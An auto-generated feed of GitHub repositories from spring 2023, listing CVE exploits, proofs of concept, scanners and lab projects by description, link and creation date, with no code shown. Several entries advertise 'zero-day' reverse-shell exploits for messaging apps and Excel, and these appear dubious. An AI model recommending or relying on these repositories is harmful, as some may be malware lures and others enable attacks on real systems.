**A writeup investigating the full extent of CVE-2019-25137** : [Ickarah/CVE-2019-25137-Version-Research](https://github.com/Ickarah/CVE-2019-25137-Version-Research) create time: 2023-05-21T13:28:53Z

**This script complements the results obtained through the keepass-password-dumper tool when exploiting the CVE-2023-32784 vulnerability affecting KeePass.** : [und3sc0n0c1d0/BruteForce-to-KeePass](https://github.com/und3sc0n0c1d0/BruteForce-to-KeePass) create time: 2023-05-20T14:37:00Z

**no description** : [antisecc/CVE-2022-46169](https://github.com/antisecc/CVE-2022-46169) create time: 2023-05-21T06:43:17Z

**A potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers could lead to an escalation of privilege.** : [Exploitables/CVE-2021-3438](https://github.com/Exploitables/CVE-2021-3438) create time: 2023-05-21T02:58:10Z

**no description** : [smallkill/CVE-2021-3493](https://github.com/smallkill/CVE-2021-3493) create time: 2023-05-21T00:14:40Z

**Original PoC for CVE-2023-32784** : [vdohney/keepass-password-dumper](https://github.com/vdohney/keepass-password-dumper) create time: 2023-05-01T17:08:55Z

**no description** : [antisecc/CVE-2022-24716](https://github.com/antisecc/CVE-2022-24716) create time: 2023-05-20T18:43:46Z

**CVE-2022-4931** : [ValeDecem10th/CVE-2022-4931](https://github.com/ValeDecem10th/CVE-2022-4931) create time: 2023-05-20T14:20:15Z

**test-send-CVE** : [2019000102494/CVE-2023-31702](https://github.com/2019000102494/CVE-2023-31702) create time: 2023-05-20T04:57:07Z

**no description** : [XC9409/CVE-2023-31634](https://github.com/XC9409/CVE-2023-31634) create time: 2023-05-19T06:05:45Z

**CVE-2023-31664 WSO2** : [adilkhan7/CVE-2023-31664](https://github.com/adilkhan7/CVE-2023-31664) create time: 2023-05-19T05:48:57Z

**no description** : [xiaosed/CVE-2023-29919](https://github.com/xiaosed/CVE-2023-29919) create time: 2023-05-19T05:48:21Z

**Golang implementation of ThinVNC exploit CVE-2019-17662. For educational purposes only.** : [thomas-osgood/CVE-2019-17662](https://github.com/thomas-osgood/CVE-2019-17662) create time: 2023-05-19T03:12:44Z

**CVE-2023-21554 Windows MessageQueuing PoC,分析见 https://www.zoemurmure.top/posts/cve_2023_21554/** : [zoemurmure/CVE-2023-21554-PoC](https://github.com/zoemurmure/CVE-2023-21554-PoC) create time: 2023-05-18T10:30:49Z

**Django SQL injection vulnerability** : [LUUANHDUC/CVE-2021-35042](https://github.com/LUUANHDUC/CVE-2021-35042) create time: 2023-05-18T00:35:20Z

**exhaustive list of all complex vulnerabilities from CVE-1999-0001 to CVE-2023-29421** : [MarcusGutierrez/complex-vulnerabilities](https://github.com/MarcusGutierrez/complex-vulnerabilities) create time: 2023-05-17T21:43:57Z

**KeePass Master Password Extraction PoC for Linux** : [CTM1/CVE-2023-32784-keepass-linux](https://github.com/CTM1/CVE-2023-32784-keepass-linux) create time: 2023-05-17T20:15:13Z

**no description** : [rootd4ddy/CVE-2023-31584](https://github.com/rootd4ddy/CVE-2023-31584) create time: 2023-05-17T20:08:48Z

**no description** : [BlizzardEternity/CVE-2022-0847](https://github.com/BlizzardEternity/CVE-2022-0847) create time: 2023-05-17T17:14:23Z

**Exploit to cve-2023-1671. So there is a test and exploitation function. The test sends a ping request to the dnslog domain from the vulnerable site. If the ping passes, the vulnerability exists, if it doesn't, then cve-2023-1671 is missing. The exploit function, on the other hand, sends a request with your command to the server.** : [csffs/cve-2023-1671](https://github.com/csffs/cve-2023-1671) create time: 2023-05-17T11:20:27Z

**no description** : [sahiloj/CVE-2023-31703](https://github.com/sahiloj/CVE-2023-31703) create time: 2023-05-17T07:22:37Z

**no description** : [sahiloj/CVE-2023-31702](https://github.com/sahiloj/CVE-2023-31702) create time: 2023-05-17T06:27:31Z

**POC for the CVE-2022-36944 vulnerability exploit** : [yarocher/lazylist-cve-poc](https://github.com/yarocher/lazylist-cve-poc) create time: 2023-05-16T15:38:49Z

**CVE-2023-31070 Broadcom BCM47xx SDK slab-out-of-bounds write PoC** : [bugprove/cve-2023-31070](https://github.com/bugprove/cve-2023-31070) create time: 2023-05-15T13:48:09Z

**A python script that checks an APK and an Android device for being vulnerable to CVE-2017–13156** : [ppapadatis/python-janus-vulnerability-scan](https://github.com/ppapadatis/python-janus-vulnerability-scan) create time: 2023-05-16T12:16:34Z

**Vulnerabilities Exploitation On Ubuntu 22.04** : [sxlmnwb/CVE-2023-0386](https://github.com/sxlmnwb/CVE-2023-0386) create time: 2023-05-16T10:26:10Z

**Use-After-Free in Netfilter nf_tables when processing batch requests CVE-2023-32233** : [oferchen/POC-CVE-2023-32233](https://github.com/oferchen/POC-CVE-2023-32233) create time: 2023-05-16T05:58:03Z

**CVE-2023-32233: Linux内核中的安全漏洞** : [Liuk3r/CVE-2023-32233](https://github.com/Liuk3r/CVE-2023-32233) create time: 2023-05-16T03:06:40Z

**Apache Flink代码执行漏洞。在Apache Flink中利用Apache Kafka JNDI注入(CVE-2023-25194)漏洞实现代码执行。** : [Veraxy00/Flink-Kafka-Vul](https://github.com/Veraxy00/Flink-Kafka-Vul) create time: 2023-05-15T08:25:56Z

**自用,poc作者为Piotr Krysiuk,在使用前请先阅读README.md** : [PIDAN-HEIDASHUAI/CVE-2023-32233](https://github.com/PIDAN-HEIDASHUAI/CVE-2023-32233) create time: 2023-05-16T02:22:26Z

**Exploit script for CVE-2022-41544 - RCE in get-simple CMS** : [yosef0x01/CVE-2022-41544](https://github.com/yosef0x01/CVE-2022-41544) create time: 2023-05-15T15:24:55Z

**Abusing CVE-2023-28206 to make something useful** : [acceleratortroll/acceleratortroll](https://github.com/acceleratortroll/acceleratortroll) create time: 2023-05-15T14:22:12Z

**https://nvd.nist.gov/vuln/detail/CVE-2022-39253** : [HiImDarwin/NetworkSecurityFinalProject](https://github.com/HiImDarwin/NetworkSecurityFinalProject) create time: 2023-05-15T13:40:17Z

**WWBN AVideo Authenticated RCE** : [jmrcsnchz/CVE-2023-32073](https://github.com/jmrcsnchz/CVE-2023-32073) create time: 2023-05-15T11:57:29Z

**CVE-2023-32243** : [RandomRobbieBF/CVE-2023-32243.](https://github.com/RandomRobbieBF/CVE-2023-32243.) create time: 2023-05-15T09:39:45Z

**no description** : [n18dcat053-luuvannga/DetectPacket-CVE-2017-11882](https://github.com/n18dcat053-luuvannga/DetectPacket-CVE-2017-11882) create time: 2023-05-15T08:47:31Z

**school project** : [gozn/detect-CVE-2019-15107-by-pyshark](https://github.com/gozn/detect-CVE-2019-15107-by-pyshark) create time: 2023-05-15T08:13:46Z

**Exploit for CVE-2023-32243 - Unauthorized Account Takeover.** : [gbrsh/CVE-2023-32243](https://github.com/gbrsh/CVE-2023-32243) create time: 2023-05-14T19:32:50Z

**This experiment is destinated to demonstrate how the DNS rebinding attack works on an emulated IoT. In the setup, we have a simulated IoT device, which can be controlled through a web interface (this is typical for many IoT devices).** : [aminetitrofine/CVE-2022-4096](https://github.com/aminetitrofine/CVE-2022-4096) create time: 2023-05-14T13:47:05Z

**Follina (CVE-2022-30190) is a Microsoft Office zero-day vulnerability that has recently been discovered. It’s a high-severity vulnerability that hackers can leverage for remote code execution (RCE) attacks.** : [aminetitrofine/CVE-2022-30190](https://github.com/aminetitrofine/CVE-2022-30190) create time: 2023-05-14T13:38:43Z

**POC for CLFS CVE-2022-24481** : [robotMD5/CVE-2022-24481-POC](https://github.com/robotMD5/CVE-2022-24481-POC) create time: 2023-05-14T07:30:23Z

**no description** : [Akash7350/CVE-2021-22204](https://github.com/Akash7350/CVE-2021-22204) create time: 2023-05-14T03:43:28Z

**no description** : [OLeDouxEt/CVE-2023-29324_Patch_Deploy](https://github.com/OLeDouxEt/CVE-2023-29324_Patch_Deploy) create time: 2023-05-13T19:40:43Z

**poc** : [little44n1o/cve-2023-32243](https://github.com/little44n1o/cve-2023-32243) create time: 2023-05-13T19:35:03Z

**CVE-2023-31503 O2OA RCE** : [ViCrack/CVE-2023-31503](https://github.com/ViCrack/CVE-2023-31503) create time: 2023-05-13T07:48:33Z

**Exploit for elevation of privilege vulnerability in QuickHeal's Seqrite EPS (CVE-2023-31497).** : [0xInfection/EPScalate](https://github.com/0xInfection/EPScalate) create time: 2023-04-09T05:26:40Z

**no description** : [raiden757/CVE-2020-17087](https://github.com/raiden757/CVE-2020-17087) create time: 2023-05-13T03:11:42Z

**Exploit for Ubuntu 20.04 using CVE-2021-3156 enhanced with post-exploitation scripts** : [PurpleOzone/PE_CVE-CVE-2021-3156](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156) create time: 2023-05-13T01:02:32Z

**A simple PoC for CVE-2022-46169 a.k.a Cacti Unauthenticated Command Injection, a vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti prior from version 1.2.17 to 1.2.22** : [Rickster5555/EH2-PoC](https://github.com/Rickster5555/EH2-PoC) create time: 2023-05-12T19:08:45Z

**no description** : [tht1997/CVE_2023](https://github.com/tht1997/CVE_2023) create time: 2023-05-12T13:49:28Z

**This PoC proves that target is vulnerable to the CVE-2021-35587. Vulnerability is found in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0** : [1s1ldur/CVE-2021-35587-Vulnerability-Check](https://github.com/1s1ldur/CVE-2021-35587-Vulnerability-Check) create time: 2023-05-12T10:22:35Z

**This PoC proves that target is vulnerable to the CVE-2021-35587. Vulnerability is found in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0** : [1s1ldur/CVE-2021-35587-Vulnerability-Check](https://github.com/1s1ldur/CVE-2021-35587-Vulnerability-Check) create time: 2023-05-12T10:16:31Z

**no description** : [hshivhare67/kernel_v4.1.15_CVE-2023-28772](https://github.com/hshivhare67/kernel_v4.1.15_CVE-2023-28772) create time: 2023-05-12T06:19:09Z

**Exploit for grafana CVE-2021-43798** : [FAOG99/GrafanaDirectoryScanner](https://github.com/FAOG99/GrafanaDirectoryScanner) create time: 2023-05-12T04:10:09Z

**This Python script aids in exploiting CVE-2022-46169 by automating payload delivery and response handling. It starts an HTTP server, listens for requests, and enables command input for real-time interaction with a vulnerable target.** : [ahanel13/ImprovedShell-for-CVE-2022-46169](https://github.com/ahanel13/ImprovedShell-for-CVE-2022-46169) create time: 2023-05-12T01:20:15Z

**no description** : [mutur4/CVE-2021-3156](https://github.com/mutur4/CVE-2021-3156) create time: 2023-05-11T19:38:16Z

**no description** : [Satheesh575555/linux-4.1.15_CVE-2023-28772](https://github.com/Satheesh575555/linux-4.1.15_CVE-2023-28772) create time: 2023-05-11T10:46:48Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2023-28772](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-28772) create time: 2023-05-11T07:47:25Z

**Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践** : [YYHYlh/Apache-Dubbo-CVE-2023-23638-exp](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp) create time: 2023-05-11T07:37:52Z

**no description** : [hheeyywweellccoommee/linux-4.1.15_CVE-2023-28772-ipchu](https://github.com/hheeyywweellccoommee/linux-4.1.15_CVE-2023-28772-ipchu) create time: 2023-05-11T01:00:46Z

**Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践** : [YYHYlh/Apache-Dubbo-CVE-2023-23638-exp](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp) create time: 2023-05-11T06:22:51Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2023-0461](https://github.com/nidhi7598/linux-4.19.72_CVE-2023-0461) create time: 2023-05-11T05:21:28Z

**no description** : [hheeyywweellccoommee/linux-4.19.72_CVE-2023-0461-ycnbd](https://github.com/hheeyywweellccoommee/linux-4.19.72_CVE-2023-0461-ycnbd) create time: 2023-05-11T01:00:45Z

**A exploit for CVE-2017-5638. This exploit works on versions 2.3.5-2.3.31 and 2.5 – 2.5.10** : [FredBrave/CVE-2017-5638-ApacheStruts2.3.5](https://github.com/FredBrave/CVE-2017-5638-ApacheStruts2.3.5) create time: 2023-05-10T22:48:58Z

**PoC for CVE-2023-2123** : [daniloalbuqrque/poc-cve-xss-encoded-wp-inventory-manager-plugin](https://github.com/daniloalbuqrque/poc-cve-xss-encoded-wp-inventory-manager-plugin) create time: 2023-04-16T00:33:56Z

**no description** : [K3ysTr0K3R/CVE-2008-5862-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2008-5862-EXPLOIT) create time: 2023-05-10T13:58:52Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2023-28772](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-28772) create time: 2023-05-10T12:32:16Z

**Ejecución de exploit de deserialización con CVE-2017-5941** : [Cr4zyD14m0nd137/Lab-for-CVE-2017-5941](https://github.com/Cr4zyD14m0nd137/Lab-for-CVE-2017-5941) create time: 2023-05-10T06:01:10Z

**no description** : [0xSalle/cve-2018-15133](https://github.com/0xSalle/cve-2018-15133) create time: 2023-05-10T06:57:54Z

**A vulnerability, which was classified as critical, was found in SourceCodester Food Ordering Management System 1.0. Affected is an unknown function of the component Registration. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-228396.** : [thehackingverse/CVE-2023-2594](https://github.com/thehackingverse/CVE-2023-2594) create time: 2023-05-10T06:07:43Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2023-28772](https://github.com/nidhi7598/linux-4.19.72_CVE-2023-28772) create time: 2023-05-10T05:22:21Z

**redis未授权、redis_CVE-2022-0543检测利用二合一脚本** : [SiennaSkies/redisHack](https://github.com/SiennaSkies/redisHack) create time: 2023-05-10T05:05:31Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2023-0461](https://github.com/nidhi7598/linux-4.19.72_CVE-2023-0461) create time: 2023-05-10T04:44:33Z

**Exploits for CVE-2023-27327 and CVE-2023-27328** : [kn32/parallels-plist-escape](https://github.com/kn32/parallels-plist-escape) create time: 2023-05-09T20:14:43Z

**Python exploit for vsftpd 2.3.4 - Backdoor Command Execution** : [Lynk4/CVE-2011-2523](https://github.com/Lynk4/CVE-2011-2523) create time: 2023-05-09T18:44:05Z

**QloApp 1.5.2: Vulnerable to XSS on two Parameter (email_create and back)** : [ahrixia/CVE-2023-30256](https://github.com/ahrixia/CVE-2023-30256) create time: 2023-04-10T16:02:27Z

**Exploit for CVE-2023-29930: blind file read/write in Genesys TFTP provisioning server configuration** : [YSaxon/TFTPlunder](https://github.com/YSaxon/TFTPlunder) create time: 2021-07-02T03:10:53Z

**Remote Command Execution exploit for vulnerability CVE-2004-2687 in DistCC Daemon v1** : [ss0wl/distcc_v1_cve_2004_2687](https://github.com/ss0wl/distcc_v1_cve_2004_2687) create time: 2023-05-09T13:49:18Z

**A writeup and theoretical Proof-of-Concept for CVE-2019-19194** : [louisabricot/writeup-cve-2019-19194](https://github.com/louisabricot/writeup-cve-2019-19194) create time: 2023-05-09T13:12:44Z

**PoC for CVE-2021-26088 written in PowerShell** : [theogobinet/CVE-2021-26088](https://github.com/theogobinet/CVE-2021-26088) create time: 2023-05-09T13:13:41Z

**PoC for CVE-2021-26088 written in PowerShell** : [theogobinet/CVE-2021-26088](https://github.com/theogobinet/CVE-2021-26088) create time: 2023-05-09T13:05:13Z

**Scanner for vScalation (CVE-2021-22015) a Local Privilege Escalation in VMWare vCenter** : [PenteraIO/vScalation-CVE-2021-22015](https://github.com/PenteraIO/vScalation-CVE-2021-22015) create time: 2021-09-30T07:16:27Z

**no description** : [hshivhare67/kernel_v4.19.72_CVE-2023-0461](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2023-0461) create time: 2023-05-09T10:44:10Z

**no description** : [hshivhare67/kernel_v4.19.72_CVE-2022-0386](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-0386) create time: 2023-05-09T08:11:58Z

**no description** : [Nigmaz/CVE-2018-1160](https://github.com/Nigmaz/CVE-2018-1160) create time: 2023-05-09T05:33:52Z

**CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV** : [nokn0wthing/CVE-2023-25002](https://github.com/nokn0wthing/CVE-2023-25002) create time: 2023-05-08T18:34:02Z

**no description** : [TardC/CVE-2023-27524](https://github.com/TardC/CVE-2023-27524) create time: 2023-05-08T16:50:08Z

**A Brief Introduction to V8 Inline Cache and Exploitating Type Confusion** : [glavstroy/CVE-2021-38001](https://github.com/glavstroy/CVE-2021-38001) create time: 2023-05-08T14:43:03Z

**SnakeYAML-CVE-2022-1471-POC** : [falconkei/snakeyaml_cve_poc](https://github.com/falconkei/snakeyaml_cve_poc) create time: 2023-05-08T14:46:22Z

**no description** : [wibuheker/Joomla-CVE-2023-23752](https://github.com/wibuheker/Joomla-CVE-2023-23752) create time: 2023-05-08T11:31:02Z

**CVE-2022-24637** : [c0derpwner/HTB-pwned](https://github.com/c0derpwner/HTB-pwned) create time: 2023-05-02T08:48:35Z

**no description** : [nawed20002/CVE-2023-30092](https://github.com/nawed20002/CVE-2023-30092) create time: 2023-05-08T05:55:31Z

**WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion** : [igruntplay/exploit-CVE-2015-8351](https://github.com/igruntplay/exploit-CVE-2015-8351) create time: 2023-05-08T02:55:32Z

**no description** : [ssst0n3/kata-cve-2020-2023-poc](https://github.com/ssst0n3/kata-cve-2020-2023-poc) create time: 2023-05-08T03:12:46Z

**CVE-2023-0386 EXP** : [CKevens/CVE-2023-0386](https://github.com/CKevens/CVE-2023-0386) create time: 2023-05-08T01:53:50Z

**An issue was discovered in Webmin through 1.920. The parameter old in password_change.cgi contains a command injection vulnerability.** : [K3ysTr0K3R/CVE-2019-15107-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2019-15107-EXPLOIT) create time: 2023-05-08T00:25:37Z

**CVE-2023-23397 PoC** : [vlad-a-man/CVE-2023-23397](https://github.com/vlad-a-man/CVE-2023-23397) create time: 2023-05-07T18:21:35Z

**An exploit script for CVE-2022-28368 designed to make exploitation less annoying, made for a HTB machine** : [Henryisnotavailable/Dompdf-Exploit-RCE](https://github.com/Henryisnotavailable/Dompdf-Exploit-RCE) create time: 2023-05-07T14:49:38Z

**2017-0021** : [cimashiro/-Awesome-CVE-2020-0601-](https://github.com/cimashiro/-Awesome-CVE-2020-0601-) create time: 2023-05-07T11:54:15Z

**Simple payload builder** : [BenEdridge/CVE-2021-46703](https://github.com/BenEdridge/CVE-2021-46703) create time: 2023-05-07T08:25:37Z

**no description** : [odx686/CVE-2017-5689](https://github.com/odx686/CVE-2017-5689) create time: 2023-05-07T05:12:51Z

**no description** : [andyhsu024/CVE-2022-41034](https://github.com/andyhsu024/CVE-2022-41034) create time: 2023-05-07T04:30:30Z

**no description** : [K3ysTr0K3R/CVE-2017-5487-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-5487-EXPLOIT) create time: 2023-05-06T22:46:08Z

**Apache version 2.4.49 & 2.4.50 is vulnerable to a directory traversal attack that could allow attackers to reveal sensitive information or gain remote code execution.** : [K3ysTr0K3R/CVE-2021-41773-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-41773-EXPLOIT) create time: 2023-05-06T17:46:29Z

**no description** : [str0ng4le/CVE-2022-30114](https://github.com/str0ng4le/CVE-2022-30114) create time: 2023-05-06T16:51:30Z

**no description** : [x-Defender/CVE-2023-29007_win-version](https://github.com/x-Defender/CVE-2023-29007_win-version) create time: 2023-05-06T13:25:35Z

**no description** : [x-Defender/CVE-2023-29007_win-git](https://github.com/x-Defender/CVE-2023-29007_win-git) create time: 2023-05-06T13:10:09Z

**CVE-2022-21907漏洞RCE PoC** : [EzoomE/CVE-2022-21907-RCE](https://github.com/EzoomE/CVE-2022-21907-RCE) create time: 2023-05-06T07:50:08Z

**CVE-2023-0386 analysis and Exp** : [chenaotian/CVE-2023-0386](https://github.com/chenaotian/CVE-2023-0386) create time: 2023-05-06T06:07:23Z

**User enumeration for CVE-2018-15473** : [GaboLC98/userenum-CVE-2018-15473](https://github.com/GaboLC98/userenum-CVE-2018-15473) create time: 2023-05-05T21:23:29Z

**DHCP Server Remote Code Execution impact: 2008 R2 SP1 до Server 2019** : [glavstroy/CVE-2023-28231](https://github.com/glavstroy/CVE-2023-28231) create time: 2023-05-05T21:13:13Z

**CVE-2008-5161 /OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)** : [pankajjarial360/OpenSSH_4.7p1](https://github.com/pankajjarial360/OpenSSH_4.7p1) create time: 2023-05-05T14:13:21Z

**bypasses the authentication functionality of vnc servers** : [glencooper872/tightvnc-zeroday-exploit-auth-bypass](https://github.com/glencooper872/tightvnc-zeroday-exploit-auth-bypass) create time: 2023-05-05T05:53:18Z

**zero day found in how excel processes hyperlinked text in formulas. poc just spawns a reverse shell, no binding of payload as of current version.** : [glencooper872/excel-zero-day-exploit](https://github.com/glencooper872/excel-zero-day-exploit) create time: 2023-05-05T05:52:47Z

**Lab vulnérble WP + Ninja forms CVE 2016-1209 (à ne pas mettre en production)** : [LeBlogDuHacker/vulnlab](https://github.com/LeBlogDuHacker/vulnlab) create time: 2023-05-05T15:54:06Z

**Zerologon exploit for CVE-2020-1472** : [G0urmetD/Zerologon-CVE-2020-1472](https://github.com/G0urmetD/Zerologon-CVE-2020-1472) create time: 2023-05-05T15:46:06Z

**VM Escape for Parallels Desktop <18.1.1** : [Malwareman007/CVE-2023-27326](https://github.com/Malwareman007/CVE-2023-27326) create time: 2023-05-05T14:11:18Z

**simple Python exploit using CVE-2018-7449 on embOS/IP FTP Server v3.22** : [antogit-sys/CVE-2018-7449](https://github.com/antogit-sys/CVE-2018-7449) create time: 2023-05-05T10:38:23Z

**CVE-2023-29489 mass exploit** : [1337r0j4n/CVE-2023-29489](https://github.com/1337r0j4n/CVE-2023-29489) create time: 2023-05-05T10:45:19Z

**no description** : [mclbn/docker-cve-2018-15473](https://github.com/mclbn/docker-cve-2018-15473) create time: 2023-05-05T09:19:05Z

**no description** : [c7w1n/CVE-2023-30185](https://github.com/c7w1n/CVE-2023-30185) create time: 2023-05-05T07:39:31Z

**CVE-2023-0386在ubuntu22.04上的提权** : [xkaneiki/CVE-2023-0386](https://github.com/xkaneiki/CVE-2023-0386) create time: 2023-05-05T03:02:13Z

**This is a exploit of CVE-2019-16278 for Nostromo 1.9.6 RCE. This exploit allows RCE on the victim machine.** : [FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE](https://github.com/FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE) create time: 2023-05-04T21:59:23Z

**🐍 Python Exploit for CVE-2022-46169** : [BKreisel/CVE-2022-46169](https://github.com/BKreisel/CVE-2022-46169) create time: 2023-05-04T21:21:05Z

**Perform With Apache-SuperSet Leaked Token [CSRF]** : [Pari-Malam/CVE-2023-27524](https://github.com/Pari-Malam/CVE-2023-27524) create time: 2023-05-04T21:43:48Z

**no description** : [threatcode/CVE-2008-6806](https://github.com/threatcode/CVE-2008-6806) create time: 2023-05-04T16:24:41Z

**Python script to obtain RCE on Mantis Bug Tracker prior to version 1.2.x Check CVE-2008-4687 for additional information** : [twisted007/mantis_rce](https://github.com/twisted007/mantis_rce) create time: 2021-09-25T00:43:25Z

**A POC for the all new CVE-2023-27524 which allows for authentication bypass and gaining access to the admin dashboard.** : [MaanVader/CVE-2023-27524-POC](https://github.com/MaanVader/CVE-2023-27524-POC) create time: 2023-05-04T13:29:09Z

**no description** : [x-Defender/git_for_windows-CVE-2023-29007](https://github.com/x-Defender/git_for_windows-CVE-2023-29007) create time: 2023-05-04T12:56:17Z

**no description** : [Satheesh575555/linux-4.19.72_CVE-2023-0386](https://github.com/Satheesh575555/linux-4.19.72_CVE-2023-0386) create time: 2023-05-04T11:55:43Z

**CVE-2021-21300** : [henry861010/Network_Security_NYCU](https://github.com/henry861010/Network_Security_NYCU) create time: 2023-05-04T07:46:35Z

**Proof of concept / CTF script for exploiting CVE-2022-46169 in Cacti, versions >=1.2.22** : [MarkStrendin/CVE-2022-46169](https://github.com/MarkStrendin/CVE-2022-46169) create time: 2023-05-03T19:53:01Z

**no description** : [0xhav0c/CVE-2013-5211](https://github.com/0xhav0c/CVE-2013-5211) create time: 2023-05-03T17:20:51Z

**Binaries for CVE-2022-22963** : [GunZF0x/CVE-2022-22963](https://github.com/GunZF0x/CVE-2022-22963) create time: 2023-05-03T16:45:06Z

**Zero day exploit that abuses the send_reaction api call to obtain a reverse shell on the targets device.** : [darthvander20/whatsapp-zero-day-exploit](https://github.com/darthvander20/whatsapp-zero-day-exploit) create time: 2023-05-03T15:58:27Z

**no description** : [zPrototype/CVE-2023-29808](https://github.com/zPrototype/CVE-2023-29808) create time: 2023-05-03T15:56:04Z

**Zero day exploit that abuses a remote code execution vulnerability in Discord send_emoji API call.** : [darthvander20/discord-zero-day-exploit](https://github.com/darthvander20/discord-zero-day-exploit) create time: 2023-05-03T15:49:04Z

**Signal RCE vulnerability found in contact exchange API** : [researchkendra91/signal-zeroday-exploit](https://github.com/researchkendra91/signal-zeroday-exploit) create time: 2023-05-03T04:18:10Z

**Zero Day revshell exploit tool for Remote Code Execution vulnerability found in Telegram's bot api broadcast_msg api call.** : [researchkendra91/telegram-0day-exploit-poc](https://github.com/researchkendra91/telegram-0day-exploit-poc) create time: 2023-05-03T04:17:08Z

**CVE-2020-15848** : [faklad/CVE-2020-15848](https://github.com/faklad/CVE-2020-15848) create time: 2023-05-03T02:35:08Z

**Hotel Druid 3.0.4 Stored Cross Site Scripting Vulnerability** : [jichngan/CVE-2023-29839](https://github.com/jichngan/CVE-2023-29839) create time: 2023-05-03T01:31:31Z

**no description** : [omespino/CVE-2023-29007](https://github.com/omespino/CVE-2023-29007) create time: 2023-05-02T23:47:51Z

**Improved PoC for Unauthenticated RCE on Cacti <= 1.2.22 - CVE-2022-46169** : [Safarchand/CVE-2022-46169](https://github.com/Safarchand/CVE-2022-46169) create time: 2023-05-02T17:26:11Z

**no description** : [trustcves/CVE-2023-31434](https://github.com/trustcves/CVE-2023-31434) create time: 2023-04-25T06:30:25Z

**no description** : [trustcves/CVE-2023-31435](https://github.com/trustcves/CVE-2023-31435) create time: 2023-04-25T05:33:51Z

**no description** : [trustcves/CVE-2023-31433](https://github.com/trustcves/CVE-2023-31433) create time: 2023-04-24T12:31:26Z

**POC for CVE-2021-41091** : [UncleJ4ck/CVE-2021-41091](https://github.com/UncleJ4ck/CVE-2021-41091) create time: 2023-05-02T07:25:13Z

**no description** : [meowhua15/CVE-2022-30190](https://github.com/meowhua15/CVE-2022-30190) create time: 2023-05-02T07:56:28Z

**Este es un código del exploit CVE-2022-46169, que recree utilizando Python3! Si por ahí estás haciendo una máquina de HTB, esto te puede ser útil... 🤞✨** : [sha-16/RCE-Cacti-1.2.22](https://github.com/sha-16/RCE-Cacti-1.2.22) create time: 2023-05-02T02:41:44Z

**This is a exploit of CVE-2022-46169 to cacti 1.2.22. This exploit allows through an RCE to obtain a reverse shell on your computer.** : [FredBrave/CVE-2022-46169-CACTI-1.2.22](https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22) create time: 2023-05-01T20:00:23Z

**CVE-2022-46718: an app may be able to read sensitive location information.** : [biscuitehh/cve-2022-46718-leaky-location](https://github.com/biscuitehh/cve-2022-46718-leaky-location) create time: 2023-05-01T18:34:52Z

**no description** : [tuankiethkt020/Phat-hien-CVE-2017-8464](https://github.com/tuankiethkt020/Phat-hien-CVE-2017-8464) create time: 2023-05-01T14:59:04Z

**Exploit for cacti version 1.2.22** : [Ruycraft1514/cacti-CVE-2022-46169](https://github.com/Ruycraft1514/cacti-CVE-2022-46169) create time: 2023-05-01T14:29:28Z

**no description** : [S4nshine/CVE-2023-23169](https://github.com/S4nshine/CVE-2023-23169) create time: 2023-05-01T10:06:44Z

**no description** : [Zoo1sondv/CVE-2021-3129](https://github.com/Zoo1sondv/CVE-2021-3129) create time: 2023-05-01T03:20:13Z

**IDURAR ERP/CRM v1 was discovered to contain a SQL injection vulnerability via the component /api/login.** : [G37SYS73M/CVE-2023-27742](https://github.com/G37SYS73M/CVE-2023-27742) create time: 2023-05-01T03:35:53Z

**To filter the actual vulnerable URLs from the screenshots, you can use the ee.sh script. Simply run ./ee.sh -f "path/to/index_screenshot.txt" -k "hacked" and the script will filter the URLs that contain the reflective XSS payload (For Example: cPanel CVE-2023-29489 ) in their screenshots.** : [whalebone7/EagleEye](https://github.com/whalebone7/EagleEye) create time: 2023-05-01T03:29:11Z

**check cve-2022-0847** : [jonathanbest7/cve-2022-0847](https://github.com/jonathanbest7/cve-2022-0847) create time: 2023-04-30T23:52:14Z

**no description** : [zPrototype/CVE-2023-29809](https://github.com/zPrototype/CVE-2023-29809) create time: 2023-04-30T20:26:04Z

**no description** : [Akash7350/CVE-2020-1472](https://github.com/Akash7350/CVE-2020-1472) create time: 2023-04-30T16:41:55Z

**Exploit for CVE-2022-23046 Authenticated SQL Injection + PHPIPAM** : [incogbyte/CVE-2022-23046](https://github.com/incogbyte/CVE-2022-23046) create time: 2023-04-30T14:50:29Z

**no description** : [fivex3/CVE-2023-27035](https://github.com/fivex3/CVE-2023-27035) create time: 2023-04-30T14:52:21Z

**no description** : [MrE-Fog/CVE-2014-0160-Chrome-Plugin](https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin) create time: 2023-04-30T13:56:47Z

**CVE-2022-46169** : [yassinebk/CVE-2022-46169](https://github.com/yassinebk/CVE-2022-46169) create time: 2023-04-30T10:37:44Z

**no description** : [gretchenfrage/CVE-2023-2033-analysis](https://github.com/gretchenfrage/CVE-2023-2033-analysis) create time: 2023-04-30T01:18:25Z

